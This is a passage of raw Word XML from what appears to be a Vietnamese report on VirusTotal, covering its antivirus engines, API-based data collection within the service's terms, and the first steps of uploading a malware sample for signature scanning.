    <w:p w14:paraId="2DF452B1"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VirusTotal sử dụng nhiều "engines" hoặc công cụ quét từ các nhà cung cấp bảo mật khác nhau để phân tích tệp và URL để xác định liệu chúng có chứa mã độc hay không. Mỗi công cụ này có cơ sở dữ liệu chữ ký riêng và các phương pháp phát hiện độc lập. Dưới đây là một số engines quan trọng và phổ biến trên VirusTotal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11151503" w14:textId="298979B4" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Avast: Avast là một công ty chuyên cung cấp phần mềm diệt virus và bảo mật trực tuyến. Engine của Avast được tích hợp vào VirusTotal để kiểm tra tệp và URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D3DD38" w14:textId="1A0EC17D" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Kaspersky: Kaspersky Lab là một nhà cung cấp bảo mật nổi tiếng, và công cụ quét của họ được sử dụng để phát hiện mã độc trên VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADA91FA" w14:textId="43219CBF" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+McAfee: McAfee là một công ty bảo mật và công nghệ thông tin có engine quét tích hợp vào VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1ED532" w14:textId="7B871809" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Symantec (Norton): Norton của Symantec cũng có engine quét tích hợp vào VirusTotal để xác định các mối đe dọa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE5D3E6" w14:textId="08B20A82" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Bitdefender: Bitdefender là một nhà cung cấp phần mềm bảo mật nổi tiếng, và engine của họ giúp VirusTotal phát hiện các mối đe dọa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF1EC2" w14:textId="3149CCCF" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+ESET: ESET là một công ty bảo mật chuyên nghiệp, và engine của họ tham gia vào quá trình quét của VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4BCA3A" w14:textId="7742E1C9" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Sophos: Sophos cung cấp giải pháp bảo mật cho doanh nghiệp và cá nhân, và engine của họ được tích hợp vào VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715CCF47" w14:textId="13C90B9C" w:rsidR="00C41018" w:rsidRPr="009E17F2" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>+TrendMicro: TrendMicro cung cấp các giải pháp bảo mật nâng cao, và engine của họ giúp phát hiện các mối đe dọa trên VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088C949"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Ngoài những engine từ các nhà cung cấp bảo mật hàng đầu, VirusTotal cũng tích hợp nhiều công cụ và engine phát hiện mã độc khác nhau để tạo ra một cơ sở dữ liệu mạnh mẽ cho việc phân tích bảo mật. Việc sử dụng nhiều engine khác nhau giúp tăng cường tính khả thi và độ chính xác của quá trình phát hiện mối đe dọa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9EBDF9" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EAEC18" w14:textId="5BFE9F44" w:rsidR="00C41018" w:rsidRPr="00E30FB4" w:rsidRDefault="00E30FB4" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc150717782"/>
      <w:bookmarkStart w:id="52" w:name="_Toc150718044"/>
      <w:bookmarkStart w:id="53" w:name="_Toc150718131"/>
      <w:r w:rsidRPr="00E30FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00E30FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>craping data</w:t>
      </w:r>
      <w:r w:rsidR="009E17F2" w:rsidRPr="00E30FB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="5D705179"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Cào dữ liệu" (còn gọi là "scraping") trong VirusTotal có thể ám chỉ một số hành động khác nhau liên quan đến việc thu thập dữ liệu từ dịch vụ này. Tuy nhiên, nên lưu ý rằng VirusTotal có các hạn chế về việc cào dữ liệu để đảm bảo tính riêng tư và an ninh của thông tin trên nền tảng này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F2795B"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Dưới đây là một số hoạt động liên quan đến việc "cào dữ liệu" trong VirusTotal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49266F33" w14:textId="5230DFD3" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Thu thập kết quả quét: Một hoạt động phổ biến là tự động thu thập kết quả quét từ VirusTotal thông qua API. Điều này có thể được sử dụng để kiểm tra tính an toàn của một danh sách lớn các tệp hoặc URL hoặc để theo dõi thay đổi trong thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284DAE1" w14:textId="38077F9D" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Thu thập thông tin về tệp và URL: Dữ liệu như thông tin hash, kết quả quét trước đó, thông tin về tệp và URL, và các dữ liệu liên quan khác có thể được cào từ VirusTotal để nghiên cứu bảo mật hoặc theo dõi sự thay đổi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDE466" w14:textId="12B77B56" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Thống kê và phân tích: Dữ liệu từ VirusTotal có thể được thu thập để phân tích xu hướng và mô hình bảo mật, giúp cải thiện hiểu biết về các mối đe dọa bảo mật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341EFF96" w14:textId="37A48B9C" w:rsidR="004544C9" w:rsidRPr="00EE0876" w:rsidRDefault="004544C9" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E8CAA13" wp14:editId="086EA029">
            <wp:extent cx="5733415" cy="2957195"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="166402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1993" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="2957195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFDDCA" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Calibri" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-Tuy nhiên, cần lưu ý rằng VirusTotal có các chính sách về việc sử dụng API và giới hạn về tần suất và khối lượng truy cập dữ liệu. Việc sử dụng cào dữ liệu từ VirusTotal cần tuân thủ các hạn chế này và tuân theo các quy tắc và điều khoản của dịch vụ để đảm bảo tính hợp pháp và đạo đức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AC8C31" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="738AE660" w14:textId="1D804F2E" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="009B296F" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc150717783"/>
      <w:bookmarkStart w:id="55" w:name="_Toc150718045"/>
      <w:bookmarkStart w:id="56" w:name="_Toc150718132"/>
      <w:r w:rsidRPr="00EA0FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>V.</w:t>
      </w:r>
      <w:r w:rsidR="00E30FB4" w:rsidRPr="00EA0FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Các bước sử dụng VirusTotal để phân tích mã độc</w:t>
      </w:r>
      <w:r w:rsidR="00E30FB4" w:rsidRPr="00EA0FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="32B4E205"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Để sử dụng tính năng phân tích mã động tự động của Virustotal , điều hướng tới URL sau “</w:t>
      </w:r>
      <w:hyperlink r:id="rId29">
        <w:r w:rsidRPr="00EE0876">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.virustotal.com/gui/home/upload</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” và upload mẫu mã độc của ta lên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604F9815"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lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4CA53E9B" wp14:editId="7A5FADC7">
            <wp:extent cx="5731200" cy="26924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31200" cy="2692400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="688A354B"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gt;Kết quả: công cụ Virustotal sẽ tiến hành phân tích mẫu mã độc mà ta đã upload lên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B6C05"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439A9398" wp14:editId="1C1D0211">
            <wp:extent cx="5731200" cy="1143000"/>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731200" cy="1143000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DBB344" w14:textId="77777777" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00C41018" w:rsidP="00B24CA2">
      <w:pPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5478FB10" w14:textId="25CCAE57" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc150717784"/>
      <w:bookmarkStart w:id="58" w:name="_Toc150718046"/>
      <w:bookmarkStart w:id="59" w:name="_Toc150718133"/>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1.Quét chữ ký</w:t>
      </w:r>
      <w:r w:rsidR="00EA0FA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="404479F7"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Quá trình kiểm tra chữ ký mã độc trên VirusTotal diễn ra theo các bước sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07DAD0" w14:textId="303E8170" w:rsidR="00C41018" w:rsidRPr="00EE0876" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Gửi tệp hoặc URL: Người dùng truy cập trang web VirusTotal (</w:t>
      </w:r>
      <w:hyperlink r:id="rId32">
        <w:r w:rsidRPr="00EE0876">
          <w:rPr>
            <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.virustotal.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) và tải lên tệp cần kiểm tra hoặc nhập URL của tệp cần kiểm tra. VirusTotal hỗ trợ kiểm tra tệp cục bộ hoặc kiểm tra tệp trực tuyến thông qua URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E2B7C" w14:textId="2D52BC21" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0876">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+Tải lên tệp: Tệp hoặc URL sẽ được tải lên VirusTotal từ máy tính của người dùng hoặc từ địa chỉ URL được cung cấp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC807B" w14:textId="4E5ADC32" w:rsidR="00C41018" w:rsidRPr="00EA0FA7" w:rsidRDefault="00000000" w:rsidP="00B24CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="28" w:lineRule="atLeast"/>
        <w:rPr>
